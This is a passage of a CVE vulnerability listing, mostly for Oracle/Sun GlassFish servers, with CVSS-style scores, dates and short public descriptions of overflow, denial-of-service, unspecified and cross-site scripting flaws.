CWE ID: 119; Vulnerability Type(s): DoS Exec Code Overflow; Publish Date: 2015-11-05; Update Date: 2017-11-04; Score: 7.5
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: Partial
Heap-based buffer overflow in the ASN.1 decoder in Mozilla Network Security Services (NSS) before 3.19.2.1 and 3.20.x before 3.20.1, as used in Firefox before 42.0 and Firefox ESR 38.x before 38.4 and other products, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted OCTET STRING data.

25. CVE-2015-3237
CWE ID: 20; Vulnerability Type(s): DoS +Info; Publish Date: 2015-06-22; Update Date: 2018-10-17; Score: 6.4
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: None; Avail.: Partial
The smb_request_state function in cURL and libcurl 7.40.0 through 7.42.1 allows remote SMB servers to obtain sensitive information from memory or cause a denial of service (out-of-bounds read and crash) via crafted length and offset values.

26. CVE-2013-1508
Publish Date: 2013-04-17; Update Date: 2013-10-11; Score: 4.3
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: None; Integ.: Partial; Avail.: None
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Sun Middleware Products 3.0.1 and 3.1.2 allows remote attackers to affect integrity via vectors related to REST Interface.

27. CVE-2012-3155
Publish Date: 2012-10-16; Update Date: 2013-10-11; Score: 5.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: None; Integ.: None; Avail.: Partial
Unspecified vulnerability in the CORBA ORB component in Sun GlassFish Enterprise Server 2.1.1, Oracle GlassFish Server 3.0.1 and 3.1.2, and Sun Java System Application Server 8.1 and 8.2 allows remote attackers to affect availability, related to CORBA ORB.

28. CVE-2012-0551
Publish Date: 2012-05-03; Update Date: 2022-05-13; Score: 5.8
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: None
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE 7 update 4 and earlier and 6 update 32 and earlier, and the GlassFish Enterprise Server component in Oracle Sun Products Suite GlassFish Enterprise Server 3.1.1, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Container or Deployment.

29. CVE-2012-0550
Publish Date: 2012-05-03; Update Date: 2017-12-07; Score: 6.8
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: Partial
Unspecified vulnerability in the GlassFish Enterprise Server component in Oracle Sun Products Suite GlassFish Enterprise Server 3.1.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web Container.

30. CVE-2012-0104
Publish Date: 2012-01-18; Update Date: 2017-08-29; Score: 5.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: None; Integ.: None; Avail.: Partial
Unspecified vulnerability in Oracle GlassFish Enterprise Server 3.0.1 and 3.1.1 allows remote attackers to affect availability via unknown vectors related to Web Container.

31. CVE-2012-0081
Publish Date: 2012-01-18; Update Date: 2017-08-29; Score: 3.7
Gained Access Level: None; Access: Local; Complexity: High; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: Partial
Unspecified vulnerability in Oracle GlassFish Enterprise Server 3.1.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Administration.

32. CVE-2011-5035
CWE ID: 20; Vulnerability Type(s): DoS; Publish Date: 2011-12-30; Update Date: 2018-01-06; Score: 5.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: None; Integ.: None; Avail.: Partial
Oracle Glassfish 2.1.1, 3.0.1, and 3.1.1, as used in Communications Server 2.0, Sun Java System Application Server 8.1 and 8.2, and possibly other products, computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters, aka Oracle security ticket S0104869.

33. CVE-2011-3559
Publish Date: 2011-10-18; Update Date: 2017-08-29; Score: 7.8
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: None; Integ.: None; Avail.: Complete
Unspecified vulnerability in Oracle Communications Server 2.0; GlassFish Enterprise Server 2.1.1, 3.0.1, and 3.1.1; and Sun Java System App Server 8.1 and 8.2 allows remote attackers to affect availability via unknown vectors related to Web Container.

34. CVE-2011-0807
Publish Date: 2011-04-20; Update Date: 2011-09-22; Score: 10.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Complete; Integ.: Complete; Avail.: Complete
Unspecified vulnerability in Oracle Sun GlassFish Enterprise Server 2.1, 2.1.1, and 3.0.1, and Sun Java System Application Server 9.1, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration.

35. CVE-2010-4438
Publish Date: 2011-01-19; Update Date: 2017-08-17; Score: 5.7
Gained Access Level: None; Access: Local; Complexity: Low; Authentication: ???; Conf.: Partial; Integ.: Partial; Avail.: Complete
Unspecified vulnerability in Oracle GlassFish 2.1, 2.1.1, and 3.0.1, and Java System Message Queue 4.1 allows local users to affect confidentiality, integrity, and availability, related to Java Message Service (JMS).

36. CVE-2010-2397
Publish Date: 2010-07-13; Update Date: 2012-10-23; Score: 2.4
Gained Access Level: None; Access: Local; Complexity: High; Authentication: ???; Conf.: Partial; Integ.: Partial; Avail.: None
Unspecified vulnerability in Oracle Sun Java System Application Server 8.0, 8.1, and 8.2; and GlassFish Enterprise Server 2.1.1; allows local users to affect confidentiality and integrity, related to the GUI.

37. CVE-2009-1553
CWE ID: 79; Vulnerability Type(s): XSS; Publish Date: 2009-05-06; Update Date: 2018-10-10; Score: 4.3
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: None; Integ.: Partial; Avail.: None
Multiple cross-site scripting (XSS) vulnerabilities in the Admin Console in Sun GlassFish Enterprise Server 2.1 allow remote attackers to inject arbitrary web script or HTML via the query string to (1) applications/applications.jsf, (2) configuration/configuration.jsf, (3) customMBeans/customMBeans.jsf, (4) resourceNode/resources.jsf, (5) sysnet/registration.jsf, or (6) webService/webServicesGeneral.jsf; or the name parameter to (7) configuration/auditModuleEdit.jsf, (8) configuration/httpListenerEdit.jsf, or (9) resourceNode/jdbcResourceEdit.jsf.

38. CVE-2008-2751
CWE ID: 79; Vulnerability Type(s): XSS; Publish Date: 2008-06-18; Update Date: 2018-10-11; Score: 4.3
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: None; Integ.: Partial; Avail.: None
Multiple cross-site scripting (XSS) vulnerabilities in the Glassfish webadmin interface in Sun Java System Application Server 9.1_01 allow remote attackers to inject arbitrary web script or HTML via the (1) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:jndiProp:JndiNew, (2) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:resTypeProp:resType, (3) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:factoryClassProp:factoryClass, or (4) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:descProp:desc parameter to (a) resourceNode/customResourceNew.jsf; the (5) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:jndiProp:JndiNew, (6) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:resTypeProp:resType, (7) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:factoryClassProp:factoryClass, (8) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:jndiLookupProp:jndiLookup, or (9) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:descProp:desc parameter to (b) resourceNode/externalResourceNew.jsf; the (10) propertyForm:propertySheet:propertSectionTextField:jndiProp:Jndi, (11) propertyForm:propertySheet:propertSectionTextField:nameProp:name, or (12) propertyForm:propertySheet:propertSectionTextField:descProp:desc parameter to (c) resourceNode/jmsDestinationNew.jsf; the (13) propertyForm:propertySheet:generalPropertySheet:jndiProp:Jndi or (14) propertyForm:propertySheet:generalPropertySheet:descProp:cd parameter to (d) resourceNode/jmsConnectionNew.jsf; the (15) propertyForm:propertySheet:propertSectionTextField:jndiProp:jnditext or (16) propertyForm:propertySheet:propertSectionTextField:descProp:desc parameter to (e) resourceNode/jdbcResourceNew.jsf; the (17) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:nameProp:name, (18) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:classNameProp:classname, or (19) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:loadOrderProp:loadOrder parameter to (f) applications/lifecycleModulesNew.jsf; or the (20) propertyForm:propertyContentPage:propertySheet:generalPropertySheet:jndiProp:name, (21) propertyForm:propertyContentPage:propertySheet:generalPropertySheet:resTypeProp:resType, or (22) propertyForm:propertyContentPage:propertySheet:generalPropertySheet:dbProp:db parameter to (g) resourceNode/jdbcConnectionPoolNew1.jsf.

Total number of vulnerabilities: 38

Written by Jane